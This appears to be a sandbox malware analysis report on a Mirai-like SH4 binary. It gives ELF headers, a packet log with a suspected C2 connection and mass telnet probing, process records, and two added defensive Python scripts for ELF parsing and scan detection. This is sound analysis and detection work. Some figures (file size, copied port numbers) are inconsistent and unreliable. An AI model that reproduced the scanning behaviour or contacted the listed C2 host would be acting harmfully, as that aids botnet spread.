              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x4001a0
Flags:0x9 (EF_SH4 in the SuperH e_flags encoding, consistent with the "sh4" in the file name)
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:82848
              Section Header Size:40
              Number of Section Headers:10
              Header String Table Index:9
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
(null) | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
.init | PROGBITS | 0x400094 | 0x94 | 0x30 | 0x0 | 0x6 | AX | 0 | 0 | 4
.text | PROGBITS | 0x4000e0 | 0xe0 | 0x111c0 | 0x0 | 0x6 | AX | 0 | 0 | 32
.fini | PROGBITS | 0x4112a0 | 0x112a0 | 0x24 | 0x0 | 0x6 | AX | 0 | 0 | 4
.rodata | PROGBITS | 0x4112c4 | 0x112c4 | 0x2610 | 0x0 | 0x2 | A | 0 | 0 | 4
.ctors | PROGBITS | 0x424000 | 0x14000 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.dtors | PROGBITS | 0x424008 | 0x14008 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.data | PROGBITS | 0x424014 | 0x14014 | 0x34c | 0x0 | 0x3 | WA | 0 | 0 | 4
.bss | NOBITS | 0x424360 | 0x14360 | 0x2514 | 0x0 | 0x3 | WA | 0 | 0 | 4
.shstrtab | STRTAB | 0x0 | 0x14360 | 0x3e | 0x0 | 0x0 | | 0 | 0 | 1
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
LOAD | 0x0 | 0x400000 | 0x400000 | 0x138d4 | 0x138d4 | 6.9034 | 0x5 | R E | 0x10000 | | .init .text .fini .rodata
LOAD | 0x14000 | 0x424000 | 0x424000 | 0x360 | 0x2874 | 2.6684 | 0x6 | RW | 0x10000 | | .ctors .dtors .data .bss
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | |
Note: the GNU_STACK header has flags 0x7 (PF_R|PF_W|PF_X), so the kernel maps this binary's stack executable; that is common for statically linked uClibc cross-builds of this kind and removes one memory-corruption mitigation. The second LOAD segment's memory size exceeds its file size by 0x2514 bytes, which is exactly the .bss section.
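The header and program-header values above can be checked without the sandbox's parser. The following script is an added example, not part of the Joe Sandbox report and not the sample's own code: it reconstructs the 52-byte ELF header and the three program headers from the values listed in this report (the resulting bytes agree with the File Content Preview, e.g. the 0x2A at offset 18), parses them back with a minimal ELF32 reader, names the machine the report left as "<unknown>", and reports whether the stack is executable. The machine/flag lookup tables and the `stack_is_executable` rule are the example's own; the constants are standard ELF values.

```python
"""Parse an ELF32 little-endian header and its program headers; check GNU_STACK.

Added example, not part of the report. build_report_header() reconstructs the header
bytes from the values listed in this report; it is not a copy of the sample file.
"""
import struct

EM_SH = 42                  # e_machine value for Renesas/Hitachi SuperH
EF_SH4 = 0x9                # SuperH e_flags value meaning SH-4 code
PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
MACHINE_NAMES = {3: "Intel 80386", 8: "MIPS", 20: "PowerPC", 40: "ARM", 42: "Renesas SH", 62: "x86-64"}
PTYPE_NAMES = {PT_LOAD: "LOAD", PT_GNU_STACK: "GNU_STACK",
               0x6474E550: "GNU_EH_FRAME", 0x6474E552: "GNU_RELRO"}


def parse_elf32_le(data):
    """Return the ELF header fields and program headers of a 32-bit little-endian ELF image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("missing ELF magic")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only ELFCLASS32 / ELFDATA2LSB is handled here")
    names = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff", "e_flags",
             "e_ehsize", "e_phentsize", "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx")
    hdr = dict(zip(names, struct.unpack_from("<HHIIIIIHHHHHH", data, 16)))
    hdr["machine_name"] = MACHINE_NAMES.get(hdr["e_machine"], "<unknown>")
    phdrs = []
    for i in range(hdr["e_phnum"]):
        off = hdr["e_phoff"] + i * hdr["e_phentsize"]
        p = dict(zip(("p_type", "p_offset", "p_vaddr", "p_paddr", "p_filesz", "p_memsz",
                      "p_flags", "p_align"), struct.unpack_from("<8I", data, off)))
        p["type_name"] = PTYPE_NAMES.get(p["p_type"], hex(p["p_type"]))
        p["flags_desc"] = "".join(c for c, b in (("R", PF_R), ("W", PF_W), ("E", PF_X))
                                  if p["p_flags"] & b)
        phdrs.append(p)
    hdr["phdrs"] = phdrs
    return hdr


def stack_is_executable(hdr):
    """True when PT_GNU_STACK carries PF_X, or is absent (loaders then default to an executable stack)."""
    gs = [p for p in hdr["phdrs"] if p["p_type"] == PT_GNU_STACK]
    return bool(gs[0]["p_flags"] & PF_X) if gs else True


def build_report_header():
    """Reconstruct the ELF header + 3 program headers from the values in this report (constructed bytes)."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # ELFCLASS32, ELFDATA2LSB, EV_CURRENT, SYSV
    ehdr = struct.pack("<HHIIIIIHHHHHH", 2, EM_SH, 1, 0x4001A0, 52, 82848, EF_SH4,
                       52, 32, 3, 40, 10, 9)
    phdrs = struct.pack("<8I", PT_LOAD, 0x0, 0x400000, 0x400000, 0x138D4, 0x138D4, PF_R | PF_X, 0x10000)
    phdrs += struct.pack("<8I", PT_LOAD, 0x14000, 0x424000, 0x424000, 0x360, 0x2874, PF_R | PF_W, 0x10000)
    phdrs += struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W | PF_X, 4)
    return e_ident + ehdr + phdrs


if __name__ == "__main__":
    hdr = parse_elf32_le(build_report_header())
    print(f"machine {hdr['e_machine']} ({hdr['machine_name']}), flags {hdr['e_flags']:#x}, "
          f"entry {hdr['e_entry']:#x}")
    for p in hdr["phdrs"]:
        print(f"{p['type_name']:<10} vaddr {p['p_vaddr']:#010x} filesz {p['p_filesz']:#x} "
              f"memsz {p['p_memsz']:#x} {p['flags_desc']}")
    print("executable stack:", stack_is_executable(hdr))
```

To run it against a real file, pass `open(path, "rb").read()` to `parse_elf32_le` instead of the reconstructed bytes; `struct.unpack_from` only reads the header region, so the whole file does not need to be copied.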

Network PCAP summary

• Total Packets: 144
• Port 5466: undefined (non-standard; the only peer that answered, 213.209.129.92, did so on this port)
• Port 23: Telnet (outbound probes only, one source port reused across every destination)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 20:48:13.469352007 CEST | 56002 | 5466 | 192.168.2.13 | 213.209.129.92
Apr 2, 2025 20:48:13.558988094 CEST | 37944 | 23 | 192.168.2.13 | 152.177.102.169
Apr 2, 2025 20:48:13.559037924 CEST | 37944 | 23 | 192.168.2.13 | 148.127.109.169
Apr 2, 2025 20:48:13.559083939 CEST | 37944 | 23 | 192.168.2.13 | 199.55.214.174
Apr 2, 2025 20:48:13.559102058 CEST | 37944 | 23 | 192.168.2.13 | 173.93.73.222
Apr 2, 2025 20:48:13.559112072 CEST | 37944 | 23 | 192.168.2.13 | 182.226.239.207
Apr 2, 2025 20:48:13.559124947 CEST | 37944 | 23 | 192.168.2.13 | 240.50.47.31
Apr 2, 2025 20:48:13.559137106 CEST | 37944 | 23 | 192.168.2.13 | 222.108.206.164
Apr 2, 2025 20:48:13.559174061 CEST | 37944 | 23 | 192.168.2.13 | 141.163.163.151
Apr 2, 2025 20:48:13.559174061 CEST | 37944 | 23 | 192.168.2.13 | 1.131.92.134
Apr 2, 2025 20:48:13.559180975 CEST | 37944 | 23 | 192.168.2.13 | 254.24.37.146
Apr 2, 2025 20:48:13.559257984 CEST | 37944 | 23 | 192.168.2.13 | 223.51.198.111
Apr 2, 2025 20:48:13.559258938 CEST | 37944 | 23 | 192.168.2.13 | 118.59.160.166
Apr 2, 2025 20:48:13.559261084 CEST | 37944 | 23 | 192.168.2.13 | 121.14.215.75
Apr 2, 2025 20:48:13.559437037 CEST | 37944 | 23 | 192.168.2.13 | 205.228.153.136
Apr 2, 2025 20:48:13.559446096 CEST | 37944 | 23 | 192.168.2.13 | 36.235.188.75
Apr 2, 2025 20:48:13.559446096 CEST | 37944 | 23 | 192.168.2.13 | 61.103.199.165
Apr 2, 2025 20:48:13.559459925 CEST | 37944 | 23 | 192.168.2.13 | 149.103.43.192
Apr 2, 2025 20:48:13.559482098 CEST | 37944 | 23 | 192.168.2.13 | 162.1.112.64
Apr 2, 2025 20:48:13.559485912 CEST | 37944 | 23 | 192.168.2.13 | 183.157.118.198
Apr 2, 2025 20:48:13.559504986 CEST | 37944 | 23 | 192.168.2.13 | 113.182.54.166
Apr 2, 2025 20:48:13.559572935 CEST | 37944 | 23 | 192.168.2.13 | 164.136.54.216
Apr 2, 2025 20:48:13.559590101 CEST | 37944 | 23 | 192.168.2.13 | 35.224.125.126
Apr 2, 2025 20:48:13.559628963 CEST | 37944 | 23 | 192.168.2.13 | 2.194.62.141
Apr 2, 2025 20:48:13.559632063 CEST | 37944 | 23 | 192.168.2.13 | 195.228.30.59
Apr 2, 2025 20:48:13.559632063 CEST | 37944 | 23 | 192.168.2.13 | 140.239.185.170
Apr 2, 2025 20:48:13.559634924 CEST | 37944 | 23 | 192.168.2.13 | 107.226.200.178
Apr 2, 2025 20:48:13.559637070 CEST | 37944 | 23 | 192.168.2.13 | 103.238.148.44
Apr 2, 2025 20:48:13.559645891 CEST | 37944 | 23 | 192.168.2.13 | 90.242.7.190
Apr 2, 2025 20:48:13.559663057 CEST | 37944 | 23 | 192.168.2.13 | 148.103.192.36
Apr 2, 2025 20:48:13.559669971 CEST | 37944 | 23 | 192.168.2.13 | 193.185.140.67
Apr 2, 2025 20:48:13.559734106 CEST | 37944 | 23 | 192.168.2.13 | 84.245.129.125
Apr 2, 2025 20:48:13.559736967 CEST | 37944 | 23 | 192.168.2.13 | 157.230.181.161
Apr 2, 2025 20:48:13.559740067 CEST | 37944 | 23 | 192.168.2.13 | 82.108.164.163
Apr 2, 2025 20:48:13.559751034 CEST | 37944 | 23 | 192.168.2.13 | 53.198.36.54
Apr 2, 2025 20:48:13.559760094 CEST | 37944 | 23 | 192.168.2.13 | 9.73.33.143
Apr 2, 2025 20:48:13.559834003 CEST | 37944 | 23 | 192.168.2.13 | 178.183.191.180
Apr 2, 2025 20:48:13.559834957 CEST | 37944 | 23 | 192.168.2.13 | 216.173.227.244
Apr 2, 2025 20:48:13.559858084 CEST | 37944 | 23 | 192.168.2.13 | 98.91.152.18
Apr 2, 2025 20:48:13.559875965 CEST | 37944 | 23 | 192.168.2.13 | 159.46.115.179
Apr 2, 2025 20:48:13.559876919 CEST | 37944 | 23 | 192.168.2.13 | 183.241.135.71
Apr 2, 2025 20:48:13.559899092 CEST | 37944 | 23 | 192.168.2.13 | 195.55.88.62
Apr 2, 2025 20:48:13.559936047 CEST | 37944 | 23 | 192.168.2.13 | 67.210.168.0
Apr 2, 2025 20:48:13.559936047 CEST | 37944 | 23 | 192.168.2.13 | 192.143.250.212
Apr 2, 2025 20:48:13.559964895 CEST | 37944 | 23 | 192.168.2.13 | 188.59.192.117
Apr 2, 2025 20:48:13.559964895 CEST | 37944 | 23 | 192.168.2.13 | 166.189.13.125
Apr 2, 2025 20:48:13.560015917 CEST | 37944 | 23 | 192.168.2.13 | 175.74.49.93
Apr 2, 2025 20:48:13.560024023 CEST | 37944 | 23 | 192.168.2.13 | 149.228.162.41
Apr 2, 2025 20:48:13.560035944 CEST | 37944 | 23 | 192.168.2.13 | 180.56.191.19
Apr 2, 2025 20:48:13.560066938 CEST | 37944 | 23 | 192.168.2.13 | 208.198.22.217
Apr 2, 2025 20:48:13.560080051 CEST | 37944 | 23 | 192.168.2.13 | 171.47.160.33
Apr 2, 2025 20:48:13.560096025 CEST | 37944 | 23 | 192.168.2.13 | 161.153.127.76
Apr 2, 2025 20:48:13.560117960 CEST | 37944 | 23 | 192.168.2.13 | 219.78.245.146
Apr 2, 2025 20:48:13.560136080 CEST | 37944 | 23 | 192.168.2.13 | 19.168.214.115
Apr 2, 2025 20:48:13.560165882 CEST | 37944 | 23 | 192.168.2.13 | 174.37.177.44
Apr 2, 2025 20:48:13.560193062 CEST | 37944 | 23 | 192.168.2.13 | 153.148.197.55
Apr 2, 2025 20:48:13.560194016 CEST | 37944 | 23 | 192.168.2.13 | 123.64.13.116
Apr 2, 2025 20:48:13.560209036 CEST | 37944 | 23 | 192.168.2.13 | 136.104.164.124
Apr 2, 2025 20:48:13.560209036 CEST | 37944 | 23 | 192.168.2.13 | 240.193.177.97
Apr 2, 2025 20:48:13.560234070 CEST | 37944 | 23 | 192.168.2.13 | 19.209.19.163
Apr 2, 2025 20:48:13.560235023 CEST | 37944 | 23 | 192.168.2.13 | 217.172.131.73
Apr 2, 2025 20:48:13.560236931 CEST | 37944 | 23 | 192.168.2.13 | 19.210.11.41
Apr 2, 2025 20:48:13.560250044 CEST | 37944 | 23 | 192.168.2.13 | 97.169.178.141
Apr 2, 2025 20:48:13.560265064 CEST | 37944 | 23 | 192.168.2.13 | 120.204.67.235
Apr 2, 2025 20:48:13.560277939 CEST | 37944 | 23 | 192.168.2.13 | 156.195.254.51
Apr 2, 2025 20:48:13.560295105 CEST | 37944 | 23 | 192.168.2.13 | 117.135.21.34
Apr 2, 2025 20:48:13.560295105 CEST | 37944 | 23 | 192.168.2.13 | 116.212.11.48
Apr 2, 2025 20:48:13.560301065 CEST | 37944 | 23 | 192.168.2.13 | 253.249.54.108
Apr 2, 2025 20:48:13.560303926 CEST | 37944 | 23 | 192.168.2.13 | 91.26.168.171
Apr 2, 2025 20:48:13.560303926 CEST | 37944 | 23 | 192.168.2.13 | 84.59.18.151
Apr 2, 2025 20:48:13.560333014 CEST | 37944 | 23 | 192.168.2.13 | 93.227.83.65
Apr 2, 2025 20:48:13.560340881 CEST | 37944 | 23 | 192.168.2.13 | 125.213.204.39
Apr 2, 2025 20:48:13.560353041 CEST | 37944 | 23 | 192.168.2.13 | 156.194.25.68
Apr 2, 2025 20:48:13.560379982 CEST | 37944 | 23 | 192.168.2.13 | 187.36.36.0
Apr 2, 2025 20:48:13.560400963 CEST | 37944 | 23 | 192.168.2.13 | 172.246.152.35
Apr 2, 2025 20:48:13.560442924 CEST | 37944 | 23 | 192.168.2.13 | 70.182.246.7
Apr 2, 2025 20:48:13.560442924 CEST | 37944 | 23 | 192.168.2.13 | 71.248.210.125
Apr 2, 2025 20:48:13.560447931 CEST | 37944 | 23 | 192.168.2.13 | 189.36.212.25
Apr 2, 2025 20:48:13.560447931 CEST | 37944 | 23 | 192.168.2.13 | 81.46.48.249
Apr 2, 2025 20:48:13.560451984 CEST | 37944 | 23 | 192.168.2.13 | 211.68.251.108
Apr 2, 2025 20:48:13.560451984 CEST | 37944 | 23 | 192.168.2.13 | 126.184.106.140
Apr 2, 2025 20:48:13.560487032 CEST | 37944 | 23 | 192.168.2.13 | 46.97.23.38
Apr 2, 2025 20:48:13.560487032 CEST | 37944 | 23 | 192.168.2.13 | 125.67.199.137
Apr 2, 2025 20:48:13.560518026 CEST | 37944 | 23 | 192.168.2.13 | 63.124.114.177
Apr 2, 2025 20:48:13.560518026 CEST | 37944 | 23 | 192.168.2.13 | 255.162.237.222
Apr 2, 2025 20:48:13.560535908 CEST | 37944 | 23 | 192.168.2.13 | 248.118.227.61
Apr 2, 2025 20:48:13.560538054 CEST | 37944 | 23 | 192.168.2.13 | 203.142.155.151
Apr 2, 2025 20:48:13.560559034 CEST | 37944 | 23 | 192.168.2.13 | 165.17.51.26
Apr 2, 2025 20:48:13.560574055 CEST | 37944 | 23 | 192.168.2.13 | 5.167.247.165
Apr 2, 2025 20:48:13.560574055 CEST | 37944 | 23 | 192.168.2.13 | 85.53.45.253
Apr 2, 2025 20:48:13.560585976 CEST | 37944 | 23 | 192.168.2.13 | 246.63.127.141
Apr 2, 2025 20:48:13.560606003 CEST | 37944 | 23 | 192.168.2.13 | 188.179.236.76
Apr 2, 2025 20:48:13.560619116 CEST | 37944 | 23 | 192.168.2.13 | 135.6.73.133
Apr 2, 2025 20:48:13.560633898 CEST | 37944 | 23 | 192.168.2.13 | 5.124.236.196
Apr 2, 2025 20:48:13.560643911 CEST | 37944 | 23 | 192.168.2.13 | 19.201.255.15
Apr 2, 2025 20:48:13.560672998 CEST | 37944 | 23 | 192.168.2.13 | 100.26.252.183
Apr 2, 2025 20:48:13.560683012 CEST | 37944 | 23 | 192.168.2.13 | 161.35.166.234
Apr 2, 2025 20:48:13.560694933 CEST | 37944 | 23 | 192.168.2.13 | 115.181.131.63
Apr 2, 2025 20:48:13.560745001 CEST | 37944 | 23 | 192.168.2.13 | 150.225.10.74
Apr 2, 2025 20:48:13.560749054 CEST | 37944 | 23 | 192.168.2.13 | 116.135.254.140
Apr 2, 2025 20:48:13.560759068 CEST | 37944 | 23 | 192.168.2.13 | 248.78.199.92
Apr 2, 2025 20:48:13.560786963 CEST | 37944 | 23 | 192.168.2.13 | 40.140.105.76
Apr 2, 2025 20:48:13.560792923 CEST | 37944 | 23 | 192.168.2.13 | 178.177.6.54
Apr 2, 2025 20:48:13.560794115 CEST | 37944 | 23 | 192.168.2.13 | 123.4.226.190
Apr 2, 2025 20:48:13.560801983 CEST | 37944 | 23 | 192.168.2.13 | 115.126.66.101
Apr 2, 2025 20:48:13.560826063 CEST | 37944 | 23 | 192.168.2.13 | 254.129.63.29
Apr 2, 2025 20:48:13.560826063 CEST | 37944 | 23 | 192.168.2.13 | 86.126.217.138
Apr 2, 2025 20:48:13.560827017 CEST | 37944 | 23 | 192.168.2.13 | 44.233.241.155
Apr 2, 2025 20:48:13.560827971 CEST | 37944 | 23 | 192.168.2.13 | 19.57.167.43
Apr 2, 2025 20:48:13.560832024 CEST | 37944 | 23 | 192.168.2.13 | 76.36.89.203
Apr 2, 2025 20:48:13.560832024 CEST | 37944 | 23 | 192.168.2.13 | 57.94.92.1
Apr 2, 2025 20:48:13.560867071 CEST | 37944 | 23 | 192.168.2.13 | 195.15.230.248
Apr 2, 2025 20:48:13.560867071 CEST | 37944 | 23 | 192.168.2.13 | 34.0.146.151
Apr 2, 2025 20:48:13.560888052 CEST | 37944 | 23 | 192.168.2.13 | 251.155.56.22
Apr 2, 2025 20:48:13.560900927 CEST | 37944 | 23 | 192.168.2.13 | 35.200.160.203
Apr 2, 2025 20:48:13.560900927 CEST | 37944 | 23 | 192.168.2.13 | 79.176.182.81
Apr 2, 2025 20:48:13.560900927 CEST | 37944 | 23 | 192.168.2.13 | 9.7.255.81
Apr 2, 2025 20:48:13.560909986 CEST | 37944 | 23 | 192.168.2.13 | 113.203.34.23
Apr 2, 2025 20:48:13.560909986 CEST | 37944 | 23 | 192.168.2.13 | 65.80.242.225
Apr 2, 2025 20:48:13.560920954 CEST | 37944 | 23 | 192.168.2.13 | 105.132.203.33
Apr 2, 2025 20:48:13.560935974 CEST | 37944 | 23 | 192.168.2.13 | 128.4.151.94
Apr 2, 2025 20:48:13.561013937 CEST | 37944 | 23 | 192.168.2.13 | 146.183.234.233
Apr 2, 2025 20:48:13.561054945 CEST | 37944 | 23 | 192.168.2.13 | 222.150.112.61
Apr 2, 2025 20:48:13.561055899 CEST | 37944 | 23 | 192.168.2.13 | 107.64.221.118
Apr 2, 2025 20:48:13.561057091 CEST | 37944 | 23 | 192.168.2.13 | 113.68.200.52
Apr 2, 2025 20:48:13.561067104 CEST | 37944 | 23 | 192.168.2.13 | 152.39.57.159
Apr 2, 2025 20:48:13.561080933 CEST | 37944 | 23 | 192.168.2.13 | 172.143.133.21
Apr 2, 2025 20:48:13.561101913 CEST | 37944 | 23 | 192.168.2.13 | 103.173.83.138
Apr 2, 2025 20:48:13.561148882 CEST | 37944 | 23 | 192.168.2.13 | 211.153.203.5
Apr 2, 2025 20:48:13.561186075 CEST | 37944 | 23 | 192.168.2.13 | 206.95.116.52
Apr 2, 2025 20:48:13.561189890 CEST | 37944 | 23 | 192.168.2.13 | 211.212.76.94
Apr 2, 2025 20:48:13.561202049 CEST | 37944 | 23 | 192.168.2.13 | 41.209.185.137
Apr 2, 2025 20:48:13.561204910 CEST | 37944 | 23 | 192.168.2.13 | 191.56.125.48
Apr 2, 2025 20:48:13.561214924 CEST | 37944 | 23 | 192.168.2.13 | 71.117.0.55
Apr 2, 2025 20:48:13.561223984 CEST | 37944 | 23 | 192.168.2.13 | 47.188.59.32
Apr 2, 2025 20:48:13.561242104 CEST | 37944 | 23 | 192.168.2.13 | 19.196.15.45
Apr 2, 2025 20:48:13.561245918 CEST | 37944 | 23 | 192.168.2.13 | 82.100.126.238
Apr 2, 2025 20:48:13.561259985 CEST | 37944 | 23 | 192.168.2.13 | 40.96.18.177
Apr 2, 2025 20:48:13.561273098 CEST | 37944 | 23 | 192.168.2.13 | 40.24.14.62
Apr 2, 2025 20:48:13.561275959 CEST | 37944 | 23 | 192.168.2.13 | 98.134.53.71
Apr 2, 2025 20:48:13.561285019 CEST | 37944 | 23 | 192.168.2.13 | 191.46.129.2
Apr 2, 2025 20:48:13.561288118 CEST | 37944 | 23 | 192.168.2.13 | 203.207.159.169
Apr 2, 2025 20:48:13.561292887 CEST | 37944 | 23 | 192.168.2.13 | 9.140.25.126
Apr 2, 2025 20:48:13.561292887 CEST | 37944 | 23 | 192.168.2.13 | 44.64.134.60
Apr 2, 2025 20:48:13.561295033 CEST | 37944 | 23 | 192.168.2.13 | 198.189.238.131
Apr 2, 2025 20:48:13.561295033 CEST | 37944 | 23 | 192.168.2.13 | 18.23.138.219
Apr 2, 2025 20:48:13.561307907 CEST | 37944 | 23 | 192.168.2.13 | 105.85.237.206
Apr 2, 2025 20:48:13.721949100 CEST | 5466 | 56002 | 213.209.129.92 | 192.168.2.13
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Apr 2, 2025 20:48:13.797626972 CEST | 192.168.1.1 | 192.168.2.13 | a7c8 | (Time to live exceeded in transit) | Time Exceeded
Apr 2, 2025 20:48:58.306484938 CEST | 192.168.2.13 | 192.168.2.1 | 8279 | (Port unreachable) | Destination Unreachable
Apr 2, 2025 20:50:18.321701050 CEST | 192.168.2.13 | 192.168.2.1 | 8279 | (Port unreachable) | Destination Unreachable
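The burst of probes listed above, every one of them from source port 37944 to port 23 on an unrelated address and all inside roughly half a millisecond, is the Mirai telnet scanner at work. The Python script below is an added example and is not part of the Joe Sandbox report: it parses rows in the five-column layout of the packet table (timestamp, source port, destination port, source IP, destination IP) and raises an alert when one source reaches many distinct destinations on one port within a short window, recording as well whether the whole burst reused a single source port. That last flag is the Mirai tell: its scanner picks one random source port at start-up and stamps every raw SYN with it, while connections built by the kernel get a fresh ephemeral port each. The sample rows are constructed from a subset of the report's entries plus two benign HTTPS flows to an RFC 5737 documentation address; the window and threshold are assumptions to tune per site.

```python
"""Horizontal-scan detector for rows in the layout of the report's packet
table (timestamp, src port, dst port, src IP, dst IP). Added example."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Constructed sample: twelve of the sample's tcp/23 probes from the report,
# one inbound packet, and two benign HTTPS flows to an RFC 5737 address.
SAMPLE_ROWS = """\
Apr 2, 2025 20:48:13.560759068 CEST | 37944 | 23 | 192.168.2.13 | 248.78.199.92
Apr 2, 2025 20:48:13.560786963 CEST | 37944 | 23 | 192.168.2.13 | 40.140.105.76
Apr 2, 2025 20:48:13.560792923 CEST | 37944 | 23 | 192.168.2.13 | 178.177.6.54
Apr 2, 2025 20:48:13.560794115 CEST | 37944 | 23 | 192.168.2.13 | 123.4.226.190
Apr 2, 2025 20:48:13.560801983 CEST | 37944 | 23 | 192.168.2.13 | 115.126.66.101
Apr 2, 2025 20:48:13.560826063 CEST | 37944 | 23 | 192.168.2.13 | 254.129.63.29
Apr 2, 2025 20:48:13.560826063 CEST | 37944 | 23 | 192.168.2.13 | 86.126.217.138
Apr 2, 2025 20:48:13.560827017 CEST | 37944 | 23 | 192.168.2.13 | 44.233.241.155
Apr 2, 2025 20:48:13.560827971 CEST | 37944 | 23 | 192.168.2.13 | 19.57.167.43
Apr 2, 2025 20:48:13.560832024 CEST | 37944 | 23 | 192.168.2.13 | 76.36.89.203
Apr 2, 2025 20:48:13.560832024 CEST | 37944 | 23 | 192.168.2.13 | 57.94.92.1
Apr 2, 2025 20:48:13.560867071 CEST | 37944 | 23 | 192.168.2.13 | 195.15.230.248
Apr 2, 2025 20:48:13.721949100 CEST | 54665 | 60022 | 213.209.129.92 | 192.168.2.13
Apr 2, 2025 20:48:20.100000000 CEST | 41022 | 443 | 192.168.2.13 | 198.51.100.7
Apr 2, 2025 20:48:21.200000000 CEST | 41023 | 443 | 192.168.2.13 | 198.51.100.7
"""

_TS = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d{1,9}) \w+$")
_EPOCH = datetime(1970, 1, 1)


@dataclass(frozen=True)
class Flow:
    ts_ns: int  # integer nanoseconds so that differences are exact
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


def parse_timestamp(text: str) -> int:
    """'Apr 2, 2025 20:48:13.560759068 CEST' -> nanoseconds since the epoch.
    The zone name is ignored: all rows of one report share it, and only
    differences between timestamps matter to the detector."""
    m = _TS.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    whole = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S") - _EPOCH
    return int(whole.total_seconds()) * 1_000_000_000 + int(m.group(2).ljust(9, "0"))


def parse_rows(text: str) -> list:
    """Parse pipe-separated rows (blank lines skipped) into Flow records."""
    flows = []
    for line in text.splitlines():
        if line.strip():
            ts, sport, dport, sip, dip = (c.strip() for c in line.split("|"))
            flows.append(Flow(parse_timestamp(ts), int(sport), int(dport), sip, dip))
    return flows


@dataclass(frozen=True)
class ScanAlert:
    src_ip: str
    dst_port: int
    distinct_targets: int
    single_source_port: bool  # every probe in the burst reused one source port
    span_ns: int              # first to last probe of the burst


def detect_horizontal_scans(flows, window_s=1.0, min_targets=10):
    """Group flows by (src IP, dst port), slide a window of window_s over each
    group and report the window holding the most distinct destinations once
    that count reaches min_targets. Both parameters are assumed defaults."""
    window_ns = int(window_s * 1_000_000_000)
    by_key = defaultdict(list)
    for f in flows:
        by_key[(f.src_ip, f.dst_port)].append(f)
    alerts = []
    for (src_ip, dst_port), group in by_key.items():
        group.sort(key=lambda f: f.ts_ns)
        best, start = None, 0
        for end in range(len(group)):
            while group[end].ts_ns - group[start].ts_ns > window_ns:
                start += 1
            burst = group[start:end + 1]
            n = len({f.dst_ip for f in burst})
            if n >= min_targets and (best is None or n > best[0]):
                best = (n, burst)
        if best:
            n, burst = best
            alerts.append(ScanAlert(src_ip, dst_port, n,
                                    len({f.src_port for f in burst}) == 1,
                                    burst[-1].ts_ns - burst[0].ts_ns))
    return alerts


if __name__ == "__main__":
    for alert in detect_horizontal_scans(parse_rows(SAMPLE_ROWS)):
        print(alert)
```

On the constructed rows the detector reports one alert for 192.168.2.13 on port 23 with twelve distinct targets, a single source port and a span of 108003 ns; the inbound packet and the two HTTPS flows produce nothing. Timestamps are kept as integer nanoseconds because epoch seconds in a float64 only resolve to a few hundred nanoseconds, which would blur exactly the sub-millisecond spacing that makes this burst distinctive.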

              System Behavior

              Start time (UTC):18:48:08
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:/tmp/xd.sh4.elf
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              Start time (UTC):18:48:08
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              Start time (UTC):18:48:09
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              Start time (UTC):18:48:09
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              Start time (UTC):18:48:09
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              Start time (UTC):18:48:12
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              Start time (UTC):18:48:12
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
              MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

              Start time (UTC):18:48:12
              Start date (UTC):02/04/2025
              Path:/tmp/xd.sh4.elf
              Arguments:-
              File size:4139976 bytes
MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/bin/journalctl
              Arguments:/usr/bin/journalctl --smart-relinquish-var
              File size:80120 bytes
              MD5 hash:bf3a987344f3bacafc44efd882abda8b

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
